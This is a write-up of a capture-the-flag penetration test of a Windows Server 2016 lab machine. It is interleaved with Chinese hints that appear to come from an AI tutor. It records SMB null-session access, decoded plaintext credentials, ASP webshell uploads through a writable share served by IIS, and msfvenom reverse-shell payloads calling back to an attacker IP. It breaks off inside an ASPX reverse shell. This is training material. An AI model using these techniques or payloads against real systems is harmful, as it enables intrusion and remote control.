Relevant
You have been assigned to a client that wants a penetration test conducted on an environment due to be released to production in seven days.
Scope of Work
The client requests that an engineer conducts an assessment of the provided virtual environment. The client has asked that minimal information be provided about the assessment, wanting the engagement conducted from the eyes of a malicious actor (black box penetration test). The client has asked that you secure two flags (no location provided) as proof of exploitation:
User.txt Root.txt Additionally, the client has provided the following scope allowances:
Any tools or techniques are permitted in this engagement, however we ask that you attempt manual exploitation first Locate and note all vulnerabilities found Submit the flags discovered to the dashboard Only the IP address assigned to your machine is in scope Find and report ALL vulnerabilities (yes, there is more than one path to root)
I encourage you to approach this challenge as an actual penetration test. Consider writing a report, to include an executive summary, vulnerability and exploitation assessment, and remediation suggestions, as this will benefit you in preparation for the eLearnSecurity Certified Professional Penetration Tester or career as a penetration tester in the field. Note - Nothing in this room requires Metasploit
Target IP Address:
10.48.137.229
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
┌──(root㉿kali)-[~]
└─# nmap -sV -O -p- 10.48.137.229
Starting Nmap 7.99 ( https://nmap.org ) at 2026-10-08 03:19 -0400
Nmap scan report for 10.48.137.229
Host is up (0.038s latency).
Not shown: 65527 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 10.0
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
3389/tcp open ms-wbt-server Microsoft Terminal Services
49667/tcp open msrpc Microsoft Windows RPC
49668/tcp open msrpc Microsoft Windows RPC
49669/tcp open msrpc Microsoft Windows RPC
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 2016 (89%)
OS CPE: cpe:/o:microsoft:windows_server_2016
Aggressive OS guesses: Microsoft Windows Server 2016 (89%)
No exact OS matches for host (test conditions non-ideal).
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 235.07 seconds
No interesting web directory find
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
┌──(root㉿kali)-[~]
└─# gobuster dir -u http://10.48.137.229/ -w /usr/share/wordlists/dirb/big.txt
===============================================================
Gobuster v3.8.2
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.48.137.229/
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirb/big.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.8.2
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
Progress: 20469 / 20469 (100.00%)
===============================================================
Finished
===============================================================
转向 445 (SMB) 和 3389 (RDP) 是非常清晰的思路。当 Web 目录爆破没有初步进展时,横向评估其他暴露的攻击面是标准的排查流程。
这里有三个维度的思考方向,你可以顺着这些线索继续推进:
1. 深入评估 445 (SMB)
- 权限边界在哪里? 在没有任何有效账密凭证的情况下,SMB 允许的最低访问权限是什么?
- 目标暴露了什么? 你是否已经尝试列出(Enumerate)目标服务器上所有的共享文件夹(Shares)?如果存在可访问的共享目录,留意其中的文件,并测试你是否具有读取甚至写入的权限。
2. 重新审视 3389 (RDP)
- 利用门槛: 除非存在像 BlueKeep (CVE-2019-0708) 这样可以直接 RCE 的协议级漏洞(但结合探测结果来看,目标极大概率是 Windows Server 2016,通常不在此类老漏洞的打击范围内),否则 RDP 的突破往往需要什么前置条件?
- 排查优先级: 思考一下,在当前的阶段,RDP 在你整体攻击路径中的优先级应该排在什么位置?
3. 你可能忽略的盲点(细节排查)
- Nmap 的“错觉”: 结果中显示 49667、49668、49669 等高位端口为
msrpc。虽然它们确实常见于 Windows 的 RPC 动态端口分配,但 Nmap 的-sV是基于探针特征匹配的。如果非标准端口上跑着其他服务(比如另一个隐藏的 Web 服务),扫描器有时会出现误判。 - 如何证伪? 除了依赖自动化扫描器,你可以用什么最原始的客户端工具去主动“碰”一下这几个高位端口,看看它们返回的真实响应到底是什么?
- 服务联动: 假设你之后在 SMB 等服务中获取了某些文件或线索,它们是否有可能与服务器上的 Web 服务(无论是 80 端口还是潜在的其他端口)产生联动,从而为你提供 Web Shell 的执行环境?
你可以先梳理一下这几条线索。打算先从哪个方向开始动手?
1
2
3
4
5
6
7
8
9
10
11
12
┌──(root㉿kali)-[~]
└─# msfconsole -q
msf > use auxiliary/scanner/smb/smb_version
msf auxiliary(scanner/smb/smb_version) > set RHOSTS 10.48.137.229
RHOSTS => 10.48.137.229
msf auxiliary(scanner/smb/smb_version) > run
/usr/share/metasploit-framework/vendor/bundle/ruby/3.3.0/gems/recog-3.1.35/lib/recog/fingerprint/regexp_factory.rb:34: warning: nested repeat operator '+' and '?' was replaced with '*' in regular expression
[*] 10.48.137.229:445 - SMB Detected (versions: 1, 2, 3) (preferred dialect: SMB 3.1.1) (compression capabilities: ) (encryption capabilities: AES-128-GCM) (signatures: optional) (uptime: 35m 2s) (guid: {1373f362-fab6-4240-bd7b-d42c1e851d37}) (authentication domain: RELEVANT)
[+] 10.48.137.229:445 - Host is running Windows 2016 Standard (build: 14393)
[*] 10.48.137.229:445 - SMB signing is not required
[*] 10.48.137.229 - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
┌──(root㉿kali)-[~]
└─# nmap -Pn -p 445 --script smb-protocols,smb2-capabilities,smb2-security-mode,smb2-time 10.48.137.229
Starting Nmap 7.99 ( https://nmap.org ) at 2026-10-08 04:00 -0400
Nmap scan report for 10.48.137.229
Host is up (0.035s latency).
PORT STATE SERVICE
445/tcp open microsoft-ds
Host script results:
| smb2-time:
| date: 2026-10-08T08:00:20
|_ start_date: 2026-10-08T07:17:03
| smb2-capabilities:
| 2.0.2:
| Distributed File System
| 2.1:
| Distributed File System
| Leasing
| Multi-credit operations
| 3.0:
| Distributed File System
| Leasing
| Multi-credit operations
| 3.0.2:
| Distributed File System
| Leasing
| Multi-credit operations
| 3.1.1:
| Distributed File System
| Leasing
|_ Multi-credit operations
| smb2-security-mode:
| 3.1.1:
|_ Message signing enabled but not required
| smb-protocols:
| dialects:
| NT LM 0.12 (SMBv1) [dangerous, but default]
| 2.0.2
| 2.1
| 3.0
| 3.0.2
|_ 3.1.1
Nmap done: 1 IP address (1 host up) scanned in 15.75 seconds
1
2
3
┌──(root㉿kali)-[~]
└─# nxc smb 10.48.137.229
SMB 10.48.137.229 445 RELEVANT [*] Windows Server 2016 Standard Evaluation 14393 x64 (name:RELEVANT) (domain:Relevant) (signing:False) (SMBv1:True)
to list shares using a null or anonymous user.
1
2
3
4
5
6
7
8
9
10
11
12
┌──(root㉿kali)-[/home/kali/Downloads]
└─# smbclient --no-pass -L //10.48.137.229
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
IPC$ IPC Remote IPC
nt4wrksv Disk
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.48.137.229 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available
Try to access an anonymous SMB Share via smbclient but failed
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
┌──(root㉿kali)-[/home/kali/Downloads]
└─# smbclient //10.48.137.229/ADMIN$ -N
do_connect: Connection to 10.48.137.229 failed (Error NT_STATUS_IO_TIMEOUT)
┌──(root㉿kali)-[/home/kali/Downloads]
└─# smbclient //10.48.137.229/C$ -N
do_connect: Connection to 10.48.137.229 failed (Error NT_STATUS_IO_TIMEOUT)
┌──(root㉿kali)-[/home/kali/Downloads]
└─# smbclient //10.48.137.229/IPC$ -N
do_connect: Connection to 10.48.137.229 failed (Error NT_STATUS_IO_TIMEOUT)
┌──(root㉿kali)-[/home/kali/Downloads]
└─# smbclient //10.48.137.229/nt4wrksv -N
do_connect: Connection to 10.48.137.229 failed (Error NT_STATUS_IO_TIMEOUT)
https://github.com/danielmiessler/SecLists
Tried brute force for Windows built-in defaults but failed: Administrator, guest, krbtgt.
你观察得非常细致,提取出了几个非常关键的信息(SMBv1、Signing False、OS Build 版本,以及非常规的共享目录)。
让我们一步步来拆解你目前的困境。暴力破解很快中断,很可能是触发了 Windows 的默认账户锁定策略(Account Lockout Policy),这本身就是一个强烈的信号:这条路可能是个兔子洞(Rabbit Hole),靶机的设计者并不希望你通过爆破来获取初始访问权限。
既然爆破不是出路,我们需要重新审视你提到的“匿名访问失败”。这里有几个方向需要你仔细回味:
1. 重新审视你的“匿名访问”姿势
- 工具默认行为的陷阱: 当你使用
smbclient //10.48.137.229/nt4wrksv时,如果没有额外参数,smbclient默认会尝试使用你当前 Linux 系统的用户名(比如root或kali)去认证。即使你直接按回车输入空密码,服务器接收到的也是User: root, Password: [Empty]。因为 Windows 上不存在root用户,所以必然返回拒绝访问。 - 什么是真正的 Null Session(空会话)? 真正的匿名/空会话登录,要求用户名为空,密码也为空。你是否在
smbclient中使用了正确的参数(例如-N或者-U "%")明确告诉服务器“我是匿名用户”? - 区分对待:
ADMIN$、C$这种默认管理共享,即使你正确使用了空会话,现代 Windows 也会拒绝匿名访问,这是预期的。但nt4wrksv是一个非默认的共享,它的权限配置取决于管理员(也就是出题人)。你确定使用正确的空会话语法去尝试nt4wrksv也失败了吗?
2. 异常往往是突破口
ADMIN$、C$、IPC$都是 Windows 系统的默认共享,而nt4wrksv(似乎是 NT4 Workstation Server 的缩写)显然是人为创建的。- 在渗透测试中,“非标准”往往意味着“配置错误”或“故意留下的入口”。把你的精力集中在
nt4wrksv这个目录上。
3. 串联之前的线索
- 既然你发现了 SMBv1 开启且 Signing 为 False,这确实对应着一些著名的协议级漏洞(虽然 Server 2016 通常不受早期 MS17-010 的直接影响,但这依然是个敏感的配置)。
- 更重要的是: 假设你通过调整命令,成功以空会话进入了
nt4wrksv,你可能会在里面找到文件,或者发现自己拥有写入权限。 - 回想一下我们上一轮提到的那些高位端口。如果一个自定义的 SMB 共享目录具有写入权限,而服务器上恰好又运行着某个你还没确认真实身份的 Web 服务……这两者之间,是否存在某种可以联动的物理路径映射关系?
下一步建议:
先不要急着找漏洞利用脚本。请查阅一下 smbclient 或者 smbmap 关于纯匿名/Null Session登录的准确语法,再去敲一次 nt4wrksv 的大门。看看这次它会给你什么回应?
Because the target machine crashed, so restart a new one.
Target IP Address: 10.48.152.59
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
┌──(root㉿kali)-[/home/kali/Downloads]
└─# smbclient //10.48.152.59/ADMIN$ -N
tree connect failed: NT_STATUS_ACCESS_DENIED
┌──(root㉿kali)-[/home/kali/Downloads]
└─# smbclient //10.48.152.59/C$ -N
tree connect failed: NT_STATUS_ACCESS_DENIED
┌──(root㉿kali)-[/home/kali/Downloads]
└─# smbclient //10.48.152.59/IPC$ -N
Try "help" to get a list of possible commands.
smb: \> ls
NT_STATUS_NO_SUCH_FILE listing \*
smb: \> exit
┌──(root㉿kali)-[/home/kali/Downloads]
└─# smbclient //10.48.152.59/nt4wrksv -N
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Sat Jul 25 17:46:04 2020
.. D 0 Sat Jul 25 17:46:04 2020
passwords.txt A 98 Sat Jul 25 11:15:33 2020
7735807 blocks of size 4096. 4913610 blocks available
smb: \> get passwords.txt
getting file \passwords.txt of size 98 as passwords.txt (0.6 KiloBytes/sec) (average 0.6 KiloBytes/sec)
1
2
3
4
5
┌──(root㉿kali)-[/home/kali/Downloads]
└─# cat passwords.txt
[User Passwords - Encoded]
Qm9iIC0gIVBAJCRXMHJEITEyMw==
QmlsbCAtIEp1dzRubmFNNG40MjA2OTY5NjkhJCQk
1
2
3
4
5
6
┌──(root㉿kali)-[/home/kali/Downloads]
└─# echo "Qm9iIC0gIVBAJCRXMHJEITEyMw==" | base64 -d
Bob - !P@$$W0rD!123
┌──(root㉿kali)-[/home/kali/Downloads]
└─# echo "QmlsbCAtIEp1dzRubmFNNG40MjA2OTY5NjkhJCQk" | base64 -d
Bill - Juw4nnaM4n420696969!$$$
Decode the base64, and we get two passwords:
1
2
Bob - !P@$$W0rD!123
Bill - Juw4nnaM4n420696969!$$$
Try to login via RDP, but failed
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
┌──(root㉿kali)-[~]
└─# xfreerdp /v:10.48.152.59 /u:'Bill' /dynamic-resolution
[05:39:58:900] [78804:000133d6] [WARN][com.freerdp.client.x11] - [load_map_from_xkbfile]: : keycode: 0x08 -> no RDP scancode found
[05:39:58:900] [78804:000133d6] [WARN][com.freerdp.client.x11] - [load_map_from_xkbfile]: ZEHA: keycode: 0x5d -> no RDP scancode found
[05:39:58:909] [78804:000133d6] [WARN][com.freerdp.core.rdp] - [log_build_warn][0x55f37a24b3e0]: *************************************************
[05:39:58:909] [78804:000133d6] [WARN][com.freerdp.core.rdp] - [log_build_warn][0x55f37a24b3e0]: This build is using [experimental] build options:
[05:39:58:909] [78804:000133d6] [WARN][com.freerdp.core.rdp] - [log_build_warn][0x55f37a24b3e0]: * 'WITH_VAAPI_H264_ENCODING=ON'
[05:39:58:909] [78804:000133d6] [WARN][com.freerdp.core.rdp] - [log_build_warn][0x55f37a24b3e0]: *
[05:39:58:909] [78804:000133d6] [WARN][com.freerdp.core.rdp] - [log_build_warn][0x55f37a24b3e0]: [experimental] build options might crash the application
[05:39:58:909] [78804:000133d6] [WARN][com.freerdp.core.rdp] - [log_build_warn][0x55f37a24b3e0]: *************************************************
[05:39:59:068] [78804:000133d6] [WARN][com.freerdp.crypto] - [verify_cb]: Certificate verification failure 'self-signed certificate (18)' at stack position 0
[05:39:59:068] [78804:000133d6] [WARN][com.freerdp.crypto] - [verify_cb]: CN = Relevant
Domain:
Password:
[05:40:18:798] [78804:000133d6] [ERROR][com.winpr.sspi.Kerberos] - [kerberos_AcquireCredentialsHandleA]: krb5_parse_name (Configuration file does not specify default realm [-1765328160])
[05:40:18:798] [78804:000133d6] [ERROR][com.winpr.sspi.Kerberos] - [kerberos_AcquireCredentialsHandleA]: krb5_parse_name (Configuration file does not specify default realm [-1765328160])
[05:40:18:878] [78804:000133d6] [WARN][com.freerdp.core.transport] - [transport_ssl_cb]: SSL error (where=SSL_CB_ALERT|SSL_CB_READ]{0x00004004}, ret=592 [fatal, internal error])
[05:40:18:878] [78804:000133d6] [ERROR][com.freerdp.core] - [transport_ssl_cb]: ERRCONNECT_PASSWORD_CERTAINLY_EXPIRED [0x0002000F]
[05:40:18:878] [78804:000133d6] [ERROR][com.freerdp.core.transport] - [transport_read_layer]: BIO_read returned an error: error:0A000438:SSL routines::tlsv1 alert internal error
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
┌──(root㉿kali)-[~]
└─# xfreerdp /v:10.48.152.59 /u:'Bob' /dynamic-resolution
[05:40:44:979] [79197:0001355f] [WARN][com.freerdp.client.x11] - [load_map_from_xkbfile]: : keycode: 0x08 -> no RDP scancode found
[05:40:44:979] [79197:0001355f] [WARN][com.freerdp.client.x11] - [load_map_from_xkbfile]: ZEHA: keycode: 0x5d -> no RDP scancode found
[05:40:44:987] [79197:0001355f] [WARN][com.freerdp.core.rdp] - [log_build_warn][0x5590274043e0]: *************************************************
[05:40:44:988] [79197:0001355f] [WARN][com.freerdp.core.rdp] - [log_build_warn][0x5590274043e0]: This build is using [experimental] build options:
[05:40:44:988] [79197:0001355f] [WARN][com.freerdp.core.rdp] - [log_build_warn][0x5590274043e0]: * 'WITH_VAAPI_H264_ENCODING=ON'
[05:40:44:988] [79197:0001355f] [WARN][com.freerdp.core.rdp] - [log_build_warn][0x5590274043e0]: *
[05:40:44:988] [79197:0001355f] [WARN][com.freerdp.core.rdp] - [log_build_warn][0x5590274043e0]: [experimental] build options might crash the application
[05:40:44:988] [79197:0001355f] [WARN][com.freerdp.core.rdp] - [log_build_warn][0x5590274043e0]: *************************************************
[05:40:45:160] [79197:0001355f] [WARN][com.freerdp.crypto] - [verify_cb]: Certificate verification failure 'self-signed certificate (18)' at stack position 0
[05:40:45:160] [79197:0001355f] [WARN][com.freerdp.crypto] - [verify_cb]: CN = Relevant
Domain:
Password:
[05:40:58:027] [79197:0001355f] [ERROR][com.winpr.sspi.Kerberos] - [kerberos_AcquireCredentialsHandleA]: krb5_parse_name (Configuration file does not specify default realm [-1765328160])
[05:40:58:027] [79197:0001355f] [ERROR][com.winpr.sspi.Kerberos] - [kerberos_AcquireCredentialsHandleA]: krb5_parse_name (Configuration file does not specify default realm [-1765328160])
[05:40:58:145] [79197:0001355f] [ERROR][com.freerdp.core.transport] - [transport_read_layer]: BIO_read returned a system error 104: Connection reset by peer
[05:40:58:145] [79197:0001355f] [ERROR][com.freerdp.core] - [transport_read_layer]: ERRCONNECT_CONNECT_TRANSPORT_FAILED [0x0002000D]
[05:40:58:308] [79197:0001355f] [ERROR][com.winpr.sspi.Kerberos] - [kerberos_AcquireCredentialsHandleA]: krb5_parse_name (Configuration file does not specify default realm [-1765328160])
[05:40:58:308] [79197:0001355f] [ERROR][com.winpr.sspi.Kerberos] - [kerberos_AcquireCredentialsHandleA]: krb5_parse_name (Configuration file does not specify default realm [-1765328160])
[05:40:58:416] [79197:0001355f] [ERROR][com.freerdp.core.transport] - [transport_read_layer]: BIO_read returned a system error 104: Connection reset by peer
[05:40:58:416] [79197:0001355f] [ERROR][com.freerdp.core] - [transport_read_layer]: ERRCONNECT_CONNECT_TRANSPORT_FAILED [0x0002000D]
[05:40:58:416] [79197:0001355f] [ERROR][com.freerdp.core] - [freerdp_connect]: freerdp_post_connect failed
太棒了,你成功通过空会话(Null Session)进入了非默认共享,并且拿到了凭证!这是非常关键的进展。
让我们来仔细解读一下 xfreerdp 报错背后的含义,这能帮你判断这条路是不是死胡同:
1. 解读 xfreerdp 的报错日志
- 关于 Bill 的报错:
ERRCONNECT_PASSWORD_CERTAINLY_EXPIRED [0x0002000F]。这是一个非常明确的提示!这说明你解密出来的密码极有可能是正确的,但是系统管理员给 Bill 的账号设置了“首次登录必须修改密码”或者“密码已过期”。由于现代 Windows RDP 默认开启了 NLA(网络级别身份验证),它要求在建立完整的 RDP 桌面会话之前就完成身份验证,这导致你无法通过常规的 xfreerdp 界面去修改密码。 - 关于 Bob 的报错:
Connection reset by peer。这通常意味着连接被直接掐断了。可能是密码不对,可能是账号被禁用,也可能是 Bob 这个用户根本不在Remote Desktop Users用户组里,没有 RDP 远程桌面的权限。
总结一下 RDP 这条路: 门槛很高,强行突破(比如尝试绕过 NLA 去改密码)可能会非常耗时,而且不一定能成功。靶机的设计者通常不会把初始访问设计得如此反直觉。
接下来该怎么思考?请顺着下面三个方向尝试:
思路一:凭证的“一鱼多吃” 既然你拿到了 Bill(甚至 Bob)的账密,为什么要死磕 RDP 呢?Windows 的凭证是通用的。
- 你之前用匿名身份无法访问
ADMIN$和C$。 - 现在你有了可能是正确的凭证,你是否尝试过用 Bill 的身份去连接 SMB?(例如使用
smbclient -U 'Bill' //10.48.152.59/ADMIN$,或者使用更高效的验证工具如crackmapexec smb/NetExec来批量验证这些凭证在 SMB 上的权限?)
思路二:挖掘 nt4wrksv 目录的最大价值
你在 nt4wrksv 里读取(Read)了文件。在渗透测试中,我们永远要多问自己一句:
- 我能写入(Write)吗?
- 如果你还在
smbclient的交互界面里,尝试用put命令随便上传一个本地的文本文件(比如test.txt)到这个共享目录里。看看是否会提示Access Denied还是成功上传?
思路三:跨服务的梦幻联动(非常关键!)
如果(我是说如果)你在思路二中发现自己竟然拥有 nt4wrksv 的写入权限,你需要立刻回想目标机器上还运行着什么服务。
- 目标机器开放了 HTTP Web 服务(80 端口,甚至可能隐藏在某个你之前扫描到的高位端口中)。
- 如果在 SMB 中暴露的
nt4wrksv目录,恰好也就是某个 Web 服务的物理根目录(或者子目录)呢? - 如何验证这个猜想? 如果你通过 SMB 上传了一个
test.txt,你能不能通过浏览器或者curl访问类似[http://10.48.152.59/nt4wrksv/test.txt](http://10.48.152.59/nt4wrksv/test.txt)或者其他相关路径来看到这个文件? - 如果可以……你觉得你可以上传一个什么类型的文件来直接拿下这台服务器?
先测试一下思路二和思路三,看看这个 nt4wrksv 到底能给你多大的自由度!
Kali Linux IP Address 192.168.162.207
Generate a Windows reverse shell
1
2
3
4
5
6
7
8
┌──(root㉿kali)-[/home/kali/Downloads]
└─# msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.162.207 LPORT=1234 -f exe -o shell.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 509 bytes
Final size of exe file: 7680 bytes
Saved as: shell.exe
Because the target machine crashed, so restart a new one.
Target IP Address: 10.48.161.50
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
┌──(root㉿kali)-[/home/kali/Downloads]
└─# smbclient //10.48.161.50/ADMIN$ -U Bob
Password for [WORKGROUP\Bob]:
tree connect failed: NT_STATUS_ACCESS_DENIED
┌──(root㉿kali)-[/home/kali/Downloads]
└─# smbclient //10.48.161.50/ADMIN$ -U Bill
Password for [WORKGROUP\Bill]:
tree connect failed: NT_STATUS_ACCESS_DENIED
┌──(root㉿kali)-[/home/kali/Downloads]
└─# smbclient //10.48.161.50/C$ -U Bob
Password for [WORKGROUP\Bob]:
tree connect failed: NT_STATUS_ACCESS_DENIED
┌──(root㉿kali)-[/home/kali/Downloads]
└─# smbclient //10.48.161.50/C$ -U Bill
Password for [WORKGROUP\Bill]:
tree connect failed: NT_STATUS_ACCESS_DENIED
┌──(root㉿kali)-[/home/kali/Downloads]
└─# echo "test where is the anonymous dir" > test.txt
┌──(root㉿kali)-[/home/kali/Downloads]
└─# smbclient //10.48.161.50/nt4wrksv -N
Try "help" to get a list of possible commands.
smb: \> put test.txt
putting file test.txt as \test.txt (0.2 kB/s) (average 0.2 kB/s)
smb: \> ls
. D 0 Thu Oct 8 06:26:59 2026
.. D 0 Thu Oct 8 06:26:59 2026
passwords.txt A 98 Sat Jul 25 11:15:33 2020
test.txt A 32 Thu Oct 8 06:26:59 2026
7735807 blocks of size 4096. 4924895 blocks available
1
2
3
4
5
6
7
8
9
┌──(root㉿kali)-[/home/kali/Downloads]
└─# cat users.txt
Bob
Bill
┌──(root㉿kali)-[/home/kali/Downloads]
└─# cat plaintextpass.txt
!P@$$W0rD!123
Juw4nnaM4n420696969!$$$
1
2
3
4
5
┌──(root㉿kali)-[/home/kali/Downloads]
└─# nxc smb 10.48.161.50 -u users.txt -p plaintextpass.txt --no-bruteforce --continue-on-success
SMB 10.48.161.50 445 RELEVANT [*] Windows Server 2016 Standard Evaluation 14393 x64 (name:RELEVANT) (domain:Relevant) (signing:False) (SMBv1:True)
SMB 10.48.161.50 445 RELEVANT [+] Relevant\Bob:!P@$$W0rD!123
SMB 10.48.161.50 445 RELEVANT [+] Relevant\Bill:Juw4nnaM4n420696969!$$$ (Guest)
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
┌──(root㉿kali)-[/home/kali/Downloads]
└─# smbclient //10.48.161.50/ADMIN$ -U Relevant\\Bob
Password for [RELEVANT\Bob]:
tree connect failed: NT_STATUS_ACCESS_DENIED
┌──(root㉿kali)-[/home/kali/Downloads]
└─# smbclient //10.48.161.50/ADMIN$ -U Relevant\\Bill
Password for [RELEVANT\Bill]:
tree connect failed: NT_STATUS_ACCESS_DENIED
┌──(root㉿kali)-[/home/kali/Downloads]
└─# smbclient //10.48.161.50/C$ -U Relevant\\Bob
Password for [RELEVANT\Bob]:
tree connect failed: NT_STATUS_ACCESS_DENIED
┌──(root㉿kali)-[/home/kali/Downloads]
└─# smbclient //10.48.161.50/C$ -U Relevant\\Bill
Password for [RELEVANT\Bill]:
tree connect failed: NT_STATUS_ACCESS_DENIED
┌──(root㉿kali)-[/home/kali/Downloads]
└─# smbclient //10.48.161.50/nt4wrksv -U Relevant\\Bob
Password for [RELEVANT\Bob]:
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Thu Oct 8 06:26:59 2026
.. D 0 Thu Oct 8 06:26:59 2026
passwords.txt A 98 Sat Jul 25 11:15:33 2020
test.txt A 32 Thu Oct 8 06:26:59 2026
7735807 blocks of size 4096. 5094447 blocks available
smb: \> exit
┌──(root㉿kali)-[/home/kali/Downloads]
└─# smbclient //10.48.161.50/nt4wrksv -U Relevant\\Bill
Password for [RELEVANT\Bill]:
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Thu Oct 8 06:26:59 2026
.. D 0 Thu Oct 8 06:26:59 2026
passwords.txt A 98 Sat Jul 25 11:15:33 2020
test.txt A 32 Thu Oct 8 06:26:59 2026
7735807 blocks of size 4096. 5094416 blocks available
smb: \> exit
Try to use web browser to access these rpc like ports but failed
1
2
3
4
5
6
7
8
9
http://10.48.161.50/
http://10.48.161.50/nt4wrksv
http://10.48.161.50/nt4wrksv/passwords.txt
http://10.48.161.50:49667/nt4wrksv
http://10.48.161.50:49667/nt4wrksv/passwords.txt
http://10.48.161.50:49668/nt4wrksv
http://10.48.161.50:49668/nt4wrksv/passwords.txt
http://10.48.161.50:49669/nt4wrksv
http://10.48.161.50:49669/nt4wrksv/passwords.txt
Maybe we can rescan the target using nmap
1
2
3
4
5
6
7
8
9
10
11
12
13
14
┌──(root㉿kali)-[~]
└─# nmap -p 49000-50000 -Pn -sV --min-rate 1000 10.48.161.50
Starting Nmap 7.99 ( https://nmap.org ) at 2026-10-08 07:21 -0400
Nmap scan report for 10.48.161.50
Host is up (0.038s latency).
Not shown: 998 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
49663/tcp open http Microsoft IIS httpd 10.0
49666/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 57.37 seconds
There is a IIS web server running on 49663 which we didn’t find before
1
49663/tcp open http Microsoft IIS httpd 10.0
Because the target machine crashed, so restart a new one.
Target IP Address: 10.48.167.49
1
2
3
http://10.48.167.49:49663/
http://10.48.167.49:49663/nt4wrksv/
http://10.48.167.49:49663/nt4wrksv/passwords.txt
Nice, we can access the nt4wrksv share on IIS web server running on 49663, we can upload a ASP webshell
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
┌──(root㉿kali)-[/home/kali/Downloads]
└─# smbclient //10.48.167.49/nt4wrksv -N
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Thu Oct 8 08:10:25 2026
.. D 0 Thu Oct 8 08:10:25 2026
passwords.txt A 98 Sat Jul 25 11:15:33 2020
7735807 blocks of size 4096. 5095854 blocks available
smb: \> put /usr/share/webshells/asp/cmdasp.asp cmdasp.asp
putting file /usr/share/webshells/asp/cmdasp.asp as \cmdasp.asp (12.5 kB/s) (average 12.5 kB/s)
smb: \> ls
. D 0 Thu Oct 8 08:14:48 2026
.. D 0 Thu Oct 8 08:14:48 2026
cmdasp.asp A 1526 Thu Oct 8 08:14:48 2026
passwords.txt A 98 Sat Jul 25 11:15:33 2020
7735807 blocks of size 4096. 5095853 blocks available
Access the webshell
1
http://10.48.167.49:49663/nt4wrksv/cmdasp.asp
Execute the commands
1
2
3
whoami
\\RELEVANT\IUSR
Seems like this webshell doesn’t display the output on the page
Try to upload another webshell
1
2
3
4
5
6
7
8
9
10
smb: \> put /usr/share/webshells/asp/cmd-asp-5.1.asp cmd-asp-5.1.asp
putting file /usr/share/webshells/asp/cmd-asp-5.1.asp as \cmd-asp-5.1.asp (9.8 kB/s) (average 11.2 kB/s)
smb: \> ls
. D 0 Thu Oct 8 08:19:55 2026
.. D 0 Thu Oct 8 08:19:55 2026
cmd-asp-5.1.asp A 1181 Thu Oct 8 08:19:55 2026
cmdasp.asp A 1526 Thu Oct 8 08:14:48 2026
passwords.txt A 98 Sat Jul 25 11:15:33 2020
7735807 blocks of size 4096. 5094274 blocks available
1
http://10.48.167.49:49663/nt4wrksv/cmd-asp-5.1.asp
1
2
3
Machine: RELEVANT
Username: IUSR
Seems like this webshell doesn’t display the output on the page neither, but the command might be executed
1
2
3
whoami
C:\inetpub\wwwroot\radC95B8.tmp
generate ASP reverse shell using msfvenoum
1
2
3
4
5
6
7
┌──(root㉿kali)-[/home/kali/Downloads]
└─# msfvenom -p windows/shell_reverse_tcp LHOST=192.168.162.207 LPORT=1234 -f asp > rev-shell.asp
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 324 bytes
Final size of asp file: 38510 bytes
1
2
smb: \> put rev-shell.asp rev-shell.asp
putting file rev-shell.asp as \rev-shell.asp (190.9 kB/s) (average 85.9 kB/s)
1
http://10.48.167.49:49663/nt4wrksv/rev-shell.asp
Pharse error
1
2
3
An error occurred on the server when processing the URL. Please contact the system administrator.
If you are the system administrator please click here to find out more about this error.
https://github.com/borjmz/aspx-reverse-shell/blob/master/shell.aspx
protected void Page_Load(object sender, EventArgs e)
{
String host = "192.168.162.207"; //CHANGE THIS
int port = 1234; ////CHANGE THIS
